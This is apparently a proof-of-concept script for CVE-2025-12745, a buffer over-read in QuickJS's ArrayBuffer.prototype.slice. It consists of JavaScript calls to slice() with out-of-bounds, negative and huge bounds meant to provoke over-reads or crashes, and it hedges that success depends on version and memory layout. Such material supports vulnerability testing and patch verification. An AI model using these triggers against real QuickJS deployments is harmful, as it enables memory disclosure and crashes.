QuickJS js_array_buffer_slice函数缓冲区过度读取漏洞(CVE-2025-12745)

// CVE-2025-12745 PoC - QuickJS Buffer Over-read in js_array_buffer_slice // This PoC demonstrates triggering buffer over-read via ArrayBuffer.prototype.slice() // with out-of-bounds parameters // Create an ArrayBuffer with specific size const buffer = new ArrayBuffer(16); // 16 bytes buffer const view = new Uint8Array(buffer); // Initialize buffer with known data for verification for (let i = 0; i < 16; i++) { view[i] = i; } console.log("Original buffer size: " + buffer.byteLength); console.log("Original buffer content:"); for (let i = 0; i < 16; i++) { console.log("Byte " + i + ": " + view[i]); } // Attempt to trigger buffer over-read by using out-of-bounds parameters // The slice() method with start > byteLength or end > byteLength // may cause the vulnerable code path to read beyond buffer boundaries try { // Test case 1: start parameter exceeds buffer length const slice1 = buffer.slice(10, 100); // end parameter beyond buffer console.log("Slice 1 (start=10, end=100) size: " + slice1.byteLength); // Test case 2: Negative values may also trigger issues const slice2 = buffer.slice(-50, 100); console.log("Slice 2 (negative start) size: " + slice2.byteLength); // Test case 3: Large offset values const slice3 = buffer.slice(0, 0x7FFFFFFF); console.log("Slice 3 (large end value) size: " + slice3.byteLength); console.log("PoC execution completed - check for memory leaks or crashes"); } catch (e) { console.log("Error occurred: " + e.message); } // Note: This PoC is for educational and testing purposes. // Successful exploitation depends on QuickJS version and memory layout.